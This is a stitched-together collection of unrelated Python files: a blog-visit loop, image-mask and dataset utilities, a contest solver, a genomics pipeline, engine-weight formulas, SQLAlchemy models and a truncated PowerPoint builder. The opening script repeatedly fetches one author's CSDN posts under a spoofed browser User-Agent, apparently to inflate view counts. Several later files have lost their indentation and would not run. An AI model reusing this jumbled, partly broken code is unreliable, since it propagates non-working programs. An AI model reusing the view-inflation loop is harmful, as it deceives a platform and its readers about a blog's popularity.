'https://blog.csdn.net/qq_37745470/article/details/88087577',
'https://blog.csdn.net/qq_37745470/article/details/88086713',
'https://blog.csdn.net/qq_37745470/article/details/88082276',
'https://blog.csdn.net/qq_37745470/article/details/88082104',
'https://blog.csdn.net/qq_37745470/article/details/88080260',
'https://blog.csdn.net/qq_37745470/article/details/88078875',
'https://blog.csdn.net/qq_37745470/article/details/88066804',
'https://blog.csdn.net/qq_37745470/article/details/88057059',
'https://blog.csdn.net/qq_37745470/article/details/88046101',
'https://blog.csdn.net/qq_37745470/article/details/88041996',
'https://blog.csdn.net/qq_37745470/article/details/87090547',
'https://blog.csdn.net/qq_37745470/article/details/86770217',
'https://blog.csdn.net/qq_37745470/article/details/86708443',
'https://blog.csdn.net/qq_37745470/article/details/86584836',
'https://blog.csdn.net/qq_37745470/article/details/86575482',
'https://blog.csdn.net/qq_37745470/article/details/86574493',
'https://blog.csdn.net/qq_37745470/article/details/86229781',
'https://blog.csdn.net/qq_37745470/article/details/86150491',
'https://blog.csdn.net/qq_37745470/article/details/85874243',
'https://blog.csdn.net/qq_37745470/article/details/85838104',
'https://blog.csdn.net/qq_37745470/article/details/85108592',
'https://blog.csdn.net/qq_37745470/article/details/84849632',
'https://blog.csdn.net/qq_37745470/article/details/84849617',
'https://blog.csdn.net/qq_37745470/article/details/84849577',
'https://blog.csdn.net/qq_37745470/article/details/84849546',
'https://blog.csdn.net/qq_37745470/article/details/84849512',
'https://blog.csdn.net/qq_37745470/article/details/84849485',
'https://blog.csdn.net/qq_37745470/article/details/84849236',
'https://blog.csdn.net/qq_37745470/article/details/84499273',
'https://blog.csdn.net/qq_37745470/article/details/84499174',
'https://blog.csdn.net/qq_37745470/article/details/84499110',
'https://blog.csdn.net/qq_37745470/article/details/84343758',
'https://blog.csdn.net/qq_37745470/article/details/84331174',
'https://blog.csdn.net/qq_37745470/article/details/84202344',
'https://blog.csdn.net/qq_37745470/article/details/84202315',
'https://blog.csdn.net/qq_37745470/article/details/84202299',
'https://blog.csdn.net/qq_37745470/article/details/84202267',
'https://blog.csdn.net/qq_37745470/article/details/84202244',
'https://blog.csdn.net/qq_37745470/article/details/84202220',
'https://blog.csdn.net/qq_37745470/article/details/84202179',
'https://blog.csdn.net/qq_37745470/article/details/84202113',
'https://blog.csdn.net/qq_37745470/article/details/84202081',
'https://blog.csdn.net/qq_37745470/article/details/83859379',
'https://blog.csdn.net/qq_37745470/article/details/83757100',
'https://blog.csdn.net/qq_37745470/article/details/83717223',
'https://blog.csdn.net/qq_37745470/article/details/83690761',
'https://blog.csdn.net/qq_37745470/article/details/83658508',
'https://blog.csdn.net/qq_37745470/article/details/83653551',
'https://blog.csdn.net/qq_37745470/article/details/83651596',
'https://blog.csdn.net/qq_37745470/article/details/83650390',
'https://blog.csdn.net/qq_37745470/article/details/83591734',
'https://blog.csdn.net/qq_37745470/article/details/83549595',
'https://blog.csdn.net/qq_37745470/article/details/83042124',
'https://blog.csdn.net/qq_37745470/article/details/83041327',
'https://blog.csdn.net/qq_37745470/article/details/83019321',
'https://blog.csdn.net/qq_37745470/article/details/83019187',
'https://blog.csdn.net/qq_37745470/article/details/83019097',
'https://blog.csdn.net/qq_37745470/article/details/83018996',
'https://blog.csdn.net/qq_37745470/article/details/83018678',
'https://blog.csdn.net/qq_37745470/article/details/82557582',
'https://blog.csdn.net/qq_37745470/article/details/81904361',
'https://blog.csdn.net/qq_37745470/article/details/81903943',
'https://blog.csdn.net/qq_37745470/article/details/81903869',
'https://blog.csdn.net/qq_37745470/article/details/81603936',
'https://blog.csdn.net/qq_37745470/article/details/81584901',
'https://blog.csdn.net/qq_37745470/article/details/81584421',
'https://blog.csdn.net/qq_37745470/article/details/81454424',
'https://blog.csdn.net/qq_37745470/article/details/81388488',
'https://blog.csdn.net/qq_37745470/article/details/81260062']
headers = {'User-Agent':'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/73.0.3683.103 Safari/537.36'}
countUrl = len(url)
def access_csdn_url():
    """Fetch every entry of the module-level ``url`` list once.

    Counts and reports HTTP 200 responses, sleeping 10 seconds between
    requests. A failure on one URL no longer aborts the whole pass: the
    original wrapped the entire loop in a single try, so one network
    error skipped every remaining URL until the outer retry loop started
    over from the first one.
    """
    count = 0
    for link in url:
        try:  # normal operation
            response = requests.get(link, headers=headers)
            if response.status_code == 200:
                count = count + 1
                print('Success ' + str(count), 'times')
        except Exception:  # network/HTTP error: report and move on
            print('Failed and Retry')
        time.sleep(10)
if __name__ == '__main__':
    # Run forever, re-visiting the whole URL list on every pass.
    while(1):
        access_csdn_url()
|
from numpy.random import randint
import numpy as np
import cv2
import torchvision
import torch
import torch.nn as nn
from PIL import Image
import os
def random_mask(height, width, channels=3):
    """Generate a random binary mask of shape (height, width, channels).

    Random lines, circles and ellipses are drawn with value 1 on a zero
    canvas and the result is inverted, so the returned uint8 array is 1
    everywhere except on the drawn shapes (0).

    Raises:
        Exception: if width or height is smaller than 64.
    """
    img = np.zeros((height, width, channels), np.uint8)
    # Stroke-thickness / radius scale. Clamp to at least 2 because
    # numpy's randint(low, high) requires high > low: for e.g. a 64x64
    # mask, int((64 + 64) * 0.007) == 0 and randint(1, 0) raised ValueError.
    size = max(int((width + height) * 0.007), 2)
    if width < 64 or height < 64:
        raise Exception("Width and Height of mask must be at least 64")
    # Draw random lines
    for _ in range(randint(1, 20)):
        x1, x2 = randint(1, width), randint(1, width)
        y1, y2 = randint(1, height), randint(1, height)
        thickness = randint(1, size)
        cv2.line(img, (x1, y1), (x2, y2), (1, 1, 1), thickness)
    # Draw random circles
    for _ in range(randint(1, 20)):
        x1, y1 = randint(1, width), randint(1, height)
        radius = randint(1, size)
        cv2.circle(img, (x1, y1), radius, (1, 1, 1), -1)
    # Draw random ellipses
    for _ in range(randint(1, 20)):
        x1, y1 = randint(1, width), randint(1, height)
        s1, s2 = randint(1, width), randint(1, height)
        a1, a2, a3 = randint(1, 180), randint(1, 180), randint(1, 180)
        thickness = randint(1, size)
        cv2.ellipse(img, (x1, y1), (s1, s2), a1, a2, a3, (1, 1, 1), thickness)
    return 1 - img
def save_image_from_dataloader3c(image, imagesavefolder, prefix, indx):
    """Save a batch of 3-channel tensors (values in [-1, 1]) as one JPEG grid.

    The tensor is moved to CPU, tiled into a grid, rescaled to [0, 255]
    and written to <imagesavefolder>/<prefix>_<indx>.jpg.
    """
    image = image.cpu()
    image = torchvision.utils.make_grid(image)
    # np.float (deprecated alias of builtin float) was removed in NumPy 1.24;
    # use the explicit float64 dtype instead.
    image = (np.transpose(image.numpy().astype(np.float64), (1, 2, 0)) + 1) / 2
    image = (image * 255).astype(np.uint8)
    image_pil = Image.fromarray(image)
    image_pil.save(os.path.join(imagesavefolder, f"{prefix}_{indx}.jpg"))
import argparse
from utils.exper_config import Exper_Config
from models.ops import *
def _str2bool(value):
    """Parse a command-line boolean flag value.

    argparse's ``type=bool`` is a classic trap: ``bool("False")`` is True
    because any non-empty string is truthy, so ``--resume False`` silently
    enabled resume. Accept the usual true/false spellings explicitly.
    """
    if isinstance(value, bool):
        return value
    if value.lower() in ("yes", "true", "t", "1"):
        return True
    if value.lower() in ("no", "false", "f", "0"):
        return False
    raise argparse.ArgumentTypeError("boolean value expected, got %r" % value)


parser = argparse.ArgumentParser()
parser.add_argument("model_config_file",
                    type=str,
                    help="yaml file for model config")
parser.add_argument("--run_type",
                    default="train",
                    type=str)
parser.add_argument("--resume",
                    default=False,
                    type=_str2bool)  # was type=bool: "False" parsed as True
parser.add_argument("--resume_step",
                    default=0,
                    type=int)
parser.add_argument("--num_epochs",
                    default=30,
                    type=int)
parser.add_argument("--batch_size",
                    default=32,
                    type=int)
parser.add_argument("--learning_rate",
                    default=1e-3,
                    type=float)
parser.add_argument("--rl_lambda",
                    default=0.0,
                    type=float)
parser.add_argument("--optimize_for",
                    default="validity,dc",
                    type=str)
parser.add_argument("--n_samples",
                    default=6400,
                    type=int)
parser.add_argument("--n_critic",
                    default=5,
                    type=int)
parser.add_argument("--z_dim",
                    default=32,
                    type=int)
parser.add_argument("--log_every",
                    default=256,
                    type=int)
parser.add_argument("--val_chkpt_every",
                    default=2048,
                    help="this value should be greater than validate_every",
                    type=int)
parser.add_argument("--dataset",
                    default="qm9",
                    type=str)
parser.add_argument("--use_cuda",
                    default=True,
                    type=_str2bool)  # was type=bool: same truthy-string bug
args = parser.parse_args()

if __name__ == "__main__":
    exper_config = Exper_Config(**vars(args))
    if args.run_type == "train":
        # run all experiments
        for model_k in exper_config.model_configs["expers"]:
            exper_config.set_curr_exper_name(model_k)
            exper_config.set_model_config(model_k)
            # run all replicas for a given experiment
            # (was: `for ... in enumerate(range(...))`, which iterated
            # (index, value) tuples; the variable is unused either way)
            for curr_replica_num in range(exper_config.total_replica_num):
                # set up model operations for a fresh replica
                model_ops = Model_Ops(exper_config)
                model_ops.train(args.resume, args.resume_step)
                exper_config.increment_replica_num()
|
# -*- coding: utf-8 -*-
# @Time : 2016/9/13 9:51
# @Author : Span
# @Site :
# @File : 5.py
# @Function : http://www.pythonchallenge.com/pc/def/peak.html
# @Software : PyCharm
# @Solution :
import urllib2
#对象序列化以及反序列化dumps() 和 load()
import cPickle as pickle
# 美观打印的结果 such as 用print 输出的是一行数据 但是数据是存在一定结构的 此时用pprint就可以输出多行 更清楚的发现数据的特征
# 作用就是更加美观的打印出数据结构
import pprint
f=urllib2.urlopen('http://www.pythonchallenge.com/pc/def/banner.p')
print type(f)
# Create an unpickler 并且.load()是通过这个文件来unpickler这个对象
result=pickle.Unpickler(f).load()
pprint.pprint(result)
output = open('5.txt', 'w')
for line in result:
print ''.join([c[0]*c[1] for c in line])
output.close() |
def permH(k, res, plus, minus, mul, div):
    """Exhaustively spend the remaining +, -, *, / operator counts on the
    global `nums` sequence, updating the global MAX/MIN of the result."""
    global MAX, MIN
    # All N-1 operators consumed: record the extremes of this evaluation.
    if k == N - 1:
        if res > MAX:
            MAX = res
        if res < MIN:
            MIN = res
        return
    nxt = nums[k + 1]
    if plus > 0:
        permH(k + 1, res + nxt, plus - 1, minus, mul, div)
    if minus > 0:
        permH(k + 1, res - nxt, plus, minus - 1, mul, div)
    if mul > 0:
        permH(k + 1, res * nxt, plus, minus, mul - 1, div)
    if div > 0:
        # int() truncates toward zero, matching the contest's division rule
        permH(k + 1, int(res / nxt), plus, minus, mul, div - 1)
for tc in range(1, int(input()) + 1):
    # N: number of operands; ops: available counts of +, -, *, /
    N = int(input())
    ops = list(map(int, input().split()))
    nums = list(map(int, input().split()))
    # Sentinels assumed wide enough for the problem's value range
    MIN = 100000000
    MAX = -100000000
    # Fold nums[0] through every operator ordering; permH updates MAX/MIN
    permH(0, nums[0], *ops)
    print('#%d %d' % (tc, MAX - MIN))
|
import sys
import argparse
import os
import glob
import shutil
import datetime
import gzip #potential increase in speed (havne't implement yet)
from mako.template import Template
def process_sample(sdir, fdir):
    """Walk *sdir* for per-sample SampleSheet.csv files, concatenate each
    sample's R1/R2 fastq.gz files into *fdir*/<sampleID>, render a bcbio
    run_info.yaml from the Mako template, run bcbio_nextgen, then delete
    the working directory."""
    #pre: it's a PE flowcell
    # lane is not considered here
    # one sample has one index
    today = datetime.date.today().strftime("%Y%m%d")
    upload_dir = '/media/KwokRaid02/pipeline-output'
    for root, dirs, files in os.walk(sdir):
        if 'SampleSheet.csv' in files:
            samplesheet = samplesheetReader(os.path.join(root, 'SampleSheet.csv'))
            sampleID = samplesheet['SampleID']
            # underscores are used as field separators downstream
            sampleID = sampleID.replace('_', '-')
            flowcell = samplesheet['FCID']
            barcode = samplesheet['Index']
            description = sampleID + '_' + samplesheet['Description']
            Recipe = samplesheet['Recipe']
            projectID = samplesheet['SampleProject']
            work_dir = os.path.join(fdir, sampleID)
            #add a safe mkdir dir
            if not os.path.exists(work_dir):
                os.makedirs(work_dir)
            # require 300 GiB free before decompressing; abort the walk otherwise
            if get_fs_freespace(work_dir) < 300*1024*1024*1024:
                print "not enough space"
                break
            r1 = glob.glob(root+"/*R1*")
            r2 = glob.glob(root+"/*R2*")
            zcat_r1, r1_fastq = generate_zcat_command(r1, work_dir, sampleID, flowcell, 'R1.fastq')
            zcat_r2, r2_fastq = generate_zcat_command(r2, work_dir, sampleID, flowcell, 'R2.fastq')
            print zcat_r1
            print zcat_r2
            # NOTE(review): shell commands are built from file names; fine for
            # trusted local data, unsafe for untrusted paths
            os.system(zcat_r1)
            os.system(zcat_r2)
            tmpl= Template(_run_info_template)
            run_info = tmpl.render(sampleID=sampleID, today=today, flowcell=projectID, upload_dir=upload_dir, fastq1 = r1_fastq, fastq2=r2_fastq, description=description)
            run_info_file = os.path.join(work_dir, sampleID + '_' + flowcell + '_run_info.yaml')
            with open(run_info_file, "w") as out_handle:
                out_handle.write(run_info)
            os.chdir(work_dir)
            os.system("bcbio_nextgen.py ~/nextgen-python2.7/bcbio-nextgen/bcbio_system.yaml %s %s -n 4" % (work_dir, run_info_file))
            # working copy is deleted; bcbio uploads results to upload_dir
            shutil.rmtree(work_dir)
_run_info_template=r"""
fc_date: ${today}
fc_name: ${flowcell}
upload:
dir: ${upload_dir}
details:
- files: [${fastq1}, ${fastq2}]
description: ${description}
analysis: variant
genome_build: GRCh37
algorithm:
aligner: bwa
recalibrate: true
realign: true
variantcaller: gatk
coverage_interval: exome
coverage_depth: high
variant_regions: /home/kwoklab-user/Shared_resources/oligos/Kidney_exome_v4_UTR_custom.GRCh37.bed
hybrid_bait: /home/kwoklab-user/Shared_resources/oligos/Kidney_exome_v4_UTR_custom.GRCh37.bed
hybrid_target: /home/kwoklab-user/Shared_resources/oligos/Kidney_exome_v4_UTR_custom.GRCh37.bed
lane: ${sampleID}
"""
def get_fs_freespace(pathname):
    """Get the free space, in bytes, of the filesystem containing pathname."""
    fs_stat = os.statvfs(pathname)
    # f_bfree counts blocks free to the superuser; f_bavail would exclude
    # blocks reserved for root on filesystems that reserve space.
    return fs_stat.f_bfree * fs_stat.f_bsize
def generate_zcat_command(files, dest_path, sampleID, flowcell, suffix):
    """Build a `zcat` shell command concatenating *files* into
    <dest_path>/<sampleID>_<flowcell>_<suffix>.

    Returns a (command, output_path) tuple."""
    final_fastq = dest_path + '/' + sampleID + '_' + flowcell + '_' + suffix
    pieces = ['zcat ']
    for fname in files:
        pieces.append(fname + ' ')
    pieces.append(' > ' + final_fastq)
    return (''.join(pieces), final_fastq)
def samplesheetReader(samplesheet):
    """Read the first two CSV lines of *samplesheet* (header row, one sample
    row) and return them zipped into a {column: value} dict.

    Fixes: the file handle was previously never closed, and the two reads
    were wrapped in a pointless ``while True`` / ``break`` loop.
    """
    with open(samplesheet, "r") as f:
        keys = f.readline().strip().split(',')
        values = f.readline().strip().split(',')
    return dict(zip(keys, values))
if __name__ == "__main__":
parser = argparse.ArgumentParser(description='concat and decompress fastq files')
parser.add_argument('-i', dest='source', help='fastq source')
parser.add_argument('-o', dest='dest', help='fastq destination', default="/media/KwokRaid01/pipeline_tmp")
options = parser.parse_args()
process_sample(options.source, options.dest)
|
#====================================================================
# obtain the weight of a turboshaft engine, given its max installed
# power "P" in kilowatts. output is a dictionary
#====================================================================
def piston_engine(P):
    """Estimate piston-engine mass in kilograms from max installed power.

    P: max installed power in kilowatts.
    Returns the engine mass in kg, from piecewise curve fits in pounds.
    """
    LB2KG = 1.0 / 2.2          # conversion from lb to kg
    hp = P / 0.746             # installed power in horsepower
    # Piecewise engine-weight fit (pounds)
    if hp <= 4:
        weight_lb = 14.0                      # up to ~5 Hp: 14 lb EL-005 engine
    elif hp <= 20:
        weight_lb = 14.0 / 4.0 * hp           # linear bridge region
    else:
        weight_lb = 2.3668 * (hp ** 0.9155)   # curve fit for larger engines
    return weight_lb * LB2KG
#====================================================================
# get SFC given flight and atmospheric conditions
# powerReq = engine output required, Pmax = max installed; units=kW
#====================================================================
def getSFC(theta, delta, powerReq, Pmax, KT, KD):
    """Specific fuel consumption in kg/kW-hr for a piston engine.

    powerReq: engine output required (kW); Pmax: max installed power (kW).
    theta/delta/KT/KD are accepted for interface compatibility: the
    altitude/temperature correction that used them is currently disabled.
    """
    hp = Pmax / 0.746
    # Base SFC curve fit (lb/hp-hr); small engines are less efficient.
    if hp <= 4.e0:
        base = 0.42e0
    elif hp < 56.e0:
        base = -0.0046 * hp + 0.5935
    else:
        base = 0.5185 * (hp ** (-0.09717e0))
    # Clamp the fit to a plausible band.
    base = min(max(base, 0.3e0), 1.5e0)
    # Penalty for running below rated power (never a bonus: floor at 1.0).
    ratio = 0.9526 * ((powerReq / Pmax) ** (-0.256))
    base = base * max(ratio, 1.0)
    # (disabled) engine-scaling correction for altitude/temperature:
    # ESF = (1.0 - KT*(theta-1.0))*(1.0 + KD*(delta-1.0))
    # sfc_corr = (-0.00932*ESF*ESF + 0.865*ESF + 0.4450)/(ESF+0.3010)
    # base = sfc_corr*base
    # Convert from lb/hp-hr to kg/kW-hr.
    return base * 0.45359 / 0.7457
|
from sqlalchemy.orm import backref, relationship, column_property, synonym
from sqlalchemy.ext.hybrid import hybrid_property
from sqlalchemy import select
from credoscript import Base, BaseQuery, schema
class Fragment(Base):
    """
    Class representing a Fragment entity from CREDO.
    Attributes
    ----------
    fragment_id
    ism
    Mapped Attributes
    -----------------
    ChemCompFragments : Query
    ChemComps : Query
        Chemical components that share this fragment.
    RDMol : FragmentRDMol
        RDKit molecule counterpart of this fragment.
    RDFP : FragmentRDFP
        RDKit fingerprint counterpart of this fragment.
    """
    __tablename__ = '%s.fragments' % schema['pdbchem']
    # Alias: the canonical OpenBabel SMILES is stored in the `ism` column.
    ism_ob_can = synonym('ism')
    # Dynamic (query-returning) link to the association rows.
    ChemCompFragments = relationship("ChemCompFragment",
                                     primaryjoin="ChemCompFragment.fragment_id==Fragment.fragment_id",
                                     foreign_keys = "[ChemCompFragment.fragment_id]",
                                     lazy='dynamic', uselist=True, innerjoin=True,
                                     backref=backref('Fragment', uselist=False, innerjoin=True, lazy=False))
    # Many-to-many to chemical components via chem_comp_fragments.
    ChemComps = relationship("ChemComp", query_class=BaseQuery,
                             secondary=Base.metadata.tables['%s.chem_comp_fragments' % schema['pdbchem']],
                             primaryjoin="Fragment.fragment_id==ChemCompFragment.fragment_id",
                             secondaryjoin="ChemCompFragment.het_id==ChemComp.het_id",
                             foreign_keys="[ChemCompFragment.fragment_id, ChemComp.het_id]",
                             lazy='dynamic', uselist=True, innerjoin=True) #
    RDMol = relationship("FragmentRDMol",
                         primaryjoin="FragmentRDMol.fragment_id==Fragment.fragment_id",
                         foreign_keys="[FragmentRDMol.fragment_id]",
                         uselist=False, innerjoin=True,
                         backref=backref('Fragment', uselist=False, innerjoin=True))
    RDFP = relationship("FragmentRDFP",
                        primaryjoin="FragmentRDFP.fragment_id==Fragment.fragment_id",
                        foreign_keys="[FragmentRDFP.fragment_id]",
                        uselist=False, innerjoin=True,
                        backref=backref('Fragment', uselist=False, innerjoin=True))
    def __repr__(self):
        """Return a debug representation containing the primary key."""
        return '<Fragment({self.fragment_id})>'.format(self=self)
    # The ism_* properties proxy the per-toolkit SMILES stored on the
    # FragmentSynonyms row (see the `Synonyms` backref below).
    @hybrid_property
    def ism_ob_univ(self):
        return self.Synonyms.ism_ob
    @hybrid_property
    def ism_oe(self):
        return self.Synonyms.ism_oe
    @hybrid_property
    def ism_rdk(self):
        return self.Synonyms.ism_rdk
    @property
    def Children(self):
        """
        Returns all fragments that are derived from this fragment (next level
        in fragmentation hierarchy).
        """
        adaptor = FragmentAdaptor(dynamic=True)
        return adaptor.fetch_all_children(self.fragment_id)
    @property
    def Parents(self):
        """Returns the fragments this fragment was derived from (previous
        level in the fragmentation hierarchy)."""
        adaptor = FragmentAdaptor(dynamic=True)
        return adaptor.fetch_all_parents(self.fragment_id)
    @property
    def Leaves(self):
        """
        Returns all terminal fragments (leaves) of this fragment.
        """
        adaptor = FragmentAdaptor(dynamic=True)
        return adaptor.fetch_all_leaves(self.fragment_id)
    @property
    def Descendants(self):
        """
        Returns all children of this fragment in the complete hierarchy.
        """
        adaptor = FragmentAdaptor(dynamic=True)
        return adaptor.fetch_all_descendants(self.fragment_id)
    @classmethod
    def like(self, smiles):
        """
        Returns an SQL function expression that uses the PostgreSQL trigram index
        to compare the SMILES strings.
        """
        # NOTE(review): classmethod first argument is conventionally `cls`,
        # not `self`; behaviour is unaffected.
        return self.ism.op('%%')(smiles)
class FragmentSynonyms(Base):
    """Per-toolkit SMILES synonyms for a fragment; reachable from Fragment
    via the `Synonyms` backref (one-to-one, eagerly loaded)."""
    __tablename__ = '%s.fragment_synonyms' % schema['pdbchem']
    Fragment = relationship(Fragment,
                            primaryjoin="Fragment.fragment_id==FragmentSynonyms.fragment_id",
                            foreign_keys="[Fragment.fragment_id]", uselist=False,
                            backref=backref('Synonyms', uselist=False, innerjoin=True, lazy=False))
from ..adaptors.fragmentadaptor import FragmentAdaptor
|
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 15:57:04 2019
@author: rohit
"""
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"""
Created on Tue Aug 13 14:23:08 2019
@author: rohit
"""
import numpy as np
# Shuffle a processed .npy dataset and split it into 3 equal chunks.
dot =""
# NOTE(review): with dot == "" these are absolute paths rooted at "/";
# presumably "." (current directory) was intended -- confirm.
data = np.load(dot + "/saver-500-3/processed_test_data_128/processed_test_data_128.npy")
print ("data shape : {}".format(data.shape))
print ("done")
length = data.shape[0]
print ("total_length : {}".format(length))
# Random permutation of sample indices
rand = np.arange(length)
np.random.shuffle(rand)
print (rand[1:10])  # NOTE(review): prints indices 1..9, skipping index 0
train_all_s = data[rand,:,:,:]
print ("train_all_s shape : {}".format(train_all_s.shape))
save_path = dot + "/saver-500-3/"
# Three equal chunks; up to 2 trailing samples are dropped by the floor division
size = length//3
for i in range(3):
    data = train_all_s[i*size:(i+1)*size,:,:,:]
    print ("index : {} : {}".format(i*size,(i+1)*size))
    print (data.shape)
    np.save(save_path + str(i+1) + ".npy", data)
    print ("saved as {}".format(save_path + str(i+1) + ".npy"))
|
from pptx import Presentation
from pptx.oxml import _SubElement
from pptx.util import Cm, Pt
import os
import glob
from parseJpg import searchAllPsJpgs, sortGrpPsJpgs
import Image
def main():
prs = Presentation('template_red.pptx')
title_slidelayout = prs.slidemasters[0].slidelayouts[0]
slide = prs.slides.add_slide(title_slidelayout)
title = slide.shapes.title
subtitle = slide.shapes.placeholders[1]
title.text = "Title!"
subtitle.text = "subtitle"
#-------glob current folder
Dirs = ['./fig/']
psJpgs = searchAllPsJpgs(Dirs)
for psJpg in psJpgs:
psJpg.printAll()
allSlides = sortGrpPsJpgs(psJpgs)
# slidesEachNumField(prs, allSlides)
slidesCompareFields(prs, allSlides)
slidesCompareNum(prs, allSlides)
#------------------------------------------
Dirs = [o for o in glob.glob('../../Run/*') if os.path.isdir(o)]
for Dir in Dirs:
Dir = Dir.replace("\\", "/")
print "Dirs=", Dirs
psJpgs = searchAllPsJpgs(Dirs)
allSlides = sortGrpPsJpgs(psJpgs)
slidesEachNumField(prs, allSlides)
slidesCompareFields(prs, allSlides)
slidesCompareNum(prs, allSlides)
foutName = 'printout_cfdresults.pptx'
prs.save(foutName)
def slidesEachNumField(prs, allSlides):
    """One slide per (case, num, field) group; table text from locFull."""
    priors = ['case', 'num']
    groupKeys = ['case', 'num', 'field']          # things the grouped figures share
    titleKeys = ['case', 'numFull', 'fieldFull']  # keys that determine the slide title
    tabKeys = ['locFull']                         # keys that determine the table text
    slides = allSlides.sortWithNewKeys(priors, groupKeys,
                                       titleKeys, tabKeys)
    countFigsNmakeSlides(prs, slides)
def slidesCompareFields(prs, allSlides):
    """One slide per (case, num), comparing fields side by side."""
    priors = ['case', 'num']
    titleKey = 'numFull'                      # determines the slide title
    groupKeys = ['case', 'num', titleKey.replace('Full', '')]
    titleKeys = ['case', 'numFull']
    tabKeys = ['fieldFull', 'unit']           # keys that determine the table text
    slides = allSlides.sortWithNewKeys(priors, groupKeys, titleKeys, tabKeys)
    countFigsNmakeSlides(prs, slides)
def slidesCompareNum(prs, allSlides):
    """One slide per (case, field, loc), comparing operating points."""
    priors = ['case', 'field']
    titleKey = 'fieldFull'                    # determines the slide title
    groupKeys = ['case', 'field', 'loc', titleKey.replace('Full', '')]
    titleKeys = ['case', 'fieldFull']
    tabKeys = ['numFull']                     # keys that determine the table text
    slides = allSlides.sortWithNewKeys(priors, groupKeys, titleKeys, tabKeys)
    countFigsNmakeSlides(prs, slides)
def countFigsNmakeSlides(prs, slidepages):
    """Dispatch each slide page to a layout based on its figure count.

    Pages with figure counts other than 2 or 6 are silently skipped."""
    i = 0
    for s in slidepages:
        i += 1
        print "\n +++ slidepage %d: " % i,
        print [s.frames[j].code for j in range(s.nf)]
        if s.nf == 2:
            addTwoFigs(prs, s)
        if s.nf == 6:
            addSixFigs(prs, s)
def imageSize(img_path):
    """Return [width, height] of the image at img_path, in pixels (floats)."""
    img = Image.open(img_path)
    width_px = float(img.size[0])
    height_px = float(img.size[1])
    # dpi-based cm conversion was considered but is unused:
    # dpi = float(img.info['dpi'])
    # cmWidth = Cm(pixelWidth / dpi * 2.54)
    # cmHeight = Cm(pixelHeight / dpi * 2.54)
    return [width_px, height_px]
def addTwoFigs(prs, slidepage, titleText=""):
slidelayout = prs.slidemasters[1].slidelayouts[0]
slide = prs.slides.add_slide(slidelayout)
#---- add figure on the left --------------
img_path = slidepage.frames[0].jpgfileFp
top = Cm(6.25)
tabLeft = left = Cm(1.14)
width = Cm(11.56)
# height = Cm(19.05)
slide.shapes.add_picture(img_path, left, top, width)
#---- add figure on the right--------------
img_path = slidepage.frames[1].jpgfileFp
left = left + width
slide.shapes.add_picture(img_path, left, top, width)
#---- title ------
title = slide.shapes.title
title.text = slidepage.titleText
print " title = ", titleText
addTableTwo(slide, tabLeft,
width, slidepage.tabTextList)
addTextBot(slide, slidepage.boxText, left=tabLeft)
return slide
def addThreeFigs(prs, psjpg1, psjpg2, psjpg3, titleText=""):
slidelayout = prs.slidemasters[1].slidelayouts[0]
slide = prs.slides.add_slide(slidelayout)
#---- add figure on the left --------------
img_path = psjpg1.jpgfileFp
txBoxLeft = left = Cm(1.27)
top = Cm(4.65)
width = Cm(13.27)
# height = Cm(19.05)
slide.shapes.add_picture(img_path, left, top, width)
#---- add figure in the middle--------------
img_path = psjpg2.jpgfileFp
left = Cm(8.86)
slide.shapes.add_picture(img_path, left, top, width)
#---- add figure on the right--------------
img_path = psjpg3.jpgfileFp
left = Cm(12.86)
slide.shapes.add_picture(img_path, left, top, width)
#---- title ------
title = slide.shapes.title
if titleText == "":
titleText = psjpg1.case + ': ' + psjpg1.fieldFull
title.text = titleText
addTextBot(slide, "Operating point: %s" %
(psjpg1.numFull), left=txBoxLeft)
addTableTwo(slide, psjpg1, psjpg2)
return slide
def addSixFigs(prs, slidepage, titleText=""):
slidelayout = prs.slidemasters[1].slidelayouts[0]
slide = prs.slides.add_slide(slidelayout)
#width = Cm(8.03)
height = Cm(6)
#---- add figure on the left --------------
img_path = slidepage.frames[0].jpgfileFp
[picW, picH] = imageSize(img_path)
WHratio = picW / picH
width = height * WHratio
top = Cm(4.65)
txBoxLeft = left = Cm(1.27)
left = Cm(2.5)
# height = Cm(19.05)
slide.shapes.add_picture(img_path, left, top, width=width, height=height)
#---- add figure in the middle--------------
img_path = slidepage.frames[1].jpgfileFp
left = Cm(9.25)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the right--------------
img_path = slidepage.frames[2].jpgfileFp
left = Cm(16)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the leftBot --------------
img_path = slidepage.frames[3].jpgfileFp
top = Cm(11.33)
left = Cm(2.5)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the midBot--------------
img_path = slidepage.frames[4].jpgfileFp
left = Cm(9.25)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- add figure on the rightBot--------------
img_path = slidepage.frames[5].jpgfileFp
left = Cm(16)
slide.shapes.add_picture(img_path, left, top, height=height)
#---- title ------
title = slide.shapes.title
title.text = slidepage.titleText
print " title = ", titleText
# addTextBot(slide, "Operating point: %s" % (psjpg1.op), left=txBoxLeft)
addTableSix(slide,
width, slidepage.tabTextList)
return slide
def addTableTwo(slide, left, tabwidth, tabTextList):
    """Add a 1x2 caption table under two figures.

    tabwidth: column width as a length value; truncated to int because
    the table API requires integer EMU widths."""
    shapes = slide.shapes
    rows = 1
    cols = 2
    # left = Cm(1.27)
    top = Cm(16.4)
    tabwidth = int(tabwidth) # width has to be an integer (EMU)
    # width = Cm(22.88)
    width = tabwidth * 2
    height = Cm(0.8)
    tbl = shapes.add_table(rows, cols, left, top, width, height)
    # set column widths
    tbl.columns[0].width = tabwidth
    tbl.columns[1].width = tabwidth
    # write one caption per column
    for i in range(0, 2):
        text = tabTextList[i]
        print " tabText = %s" % text
        tbl.cell(0, i).text = text
        tf = tbl.cell(0, i).textframe
        font = tf.paragraphs[0].font
        font.size = Pt(16)
        font.bold = False
        set_font_color_and_typeface(font, rgbColor("BLACK"), 'Arial')
def addTableSix(slide,
                tabwidth,
                tabTextList):
    """Add two 1x3 caption tables (one per figure row) for a six-figure
    slide; tabwidth is truncated to an integer EMU column width."""
    shapes = slide.shapes
    rows = 1
    cols = 3
    left = Cm(2.5)
    top = Cm(10.36)
    tabwidth = int(tabwidth) # width has to be an integer (EMU)
    width = tabwidth * 3
    height = Cm(0.6)
    tbl = shapes.add_table(rows, cols, left, top, width, height)
    # set column widths
    tbl.columns[0].width = tabwidth
    tbl.columns[1].width = tabwidth
    tbl.columns[2].width = width - 2 * tabwidth
    # write column headings
